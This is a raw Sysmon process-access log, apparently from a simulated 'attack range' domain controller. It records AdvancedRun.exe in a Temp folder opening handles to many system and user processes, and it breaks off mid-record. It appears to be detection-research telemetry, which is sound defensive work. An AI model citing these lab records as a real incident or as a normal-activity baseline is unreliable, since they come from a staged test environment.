Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.758{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A9-61E9-9460-000000002402}688C:\Program Files\Mozilla 
Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968438Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.757{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A9-61E9-9360-000000002402}6316C:\Program Files\Mozilla 
Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968437Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.757{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A8-61E9-9260-000000002402}5876C:\Program Files\Mozilla 
Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.757{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A8-61E9-9160-000000002402}4996C:\Program Files\Mozilla 
22:21:53.752{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBC-61E7-DF00-000000002402}908C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000002968407Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.752{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBC-61E7-DD00-000000002402}4000C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968406Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.752{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBC-61E7-DC00-000000002402}2092C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968405Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.752{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0B37-61E7-8500-000000002402}500C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968404Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.751{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AC0-61E7-4300-000000002402}3476C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968403Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.751{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AC0-61E7-3F00-000000002402}3388C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968402Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.751{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABF-61E7-3800-000000002402}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968401Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.751{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-3000-000000002402}2304C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968400Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.751{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2E00-000000002402}3044C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968399Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.751{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2D00-000000002402}3032C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968398Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.750{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2C00-000000002402}2984C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.750{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2B00-000000002402}2976C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968396Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.750{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2A00-000000002402}2960C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.750{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2900-000000002402}2948C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\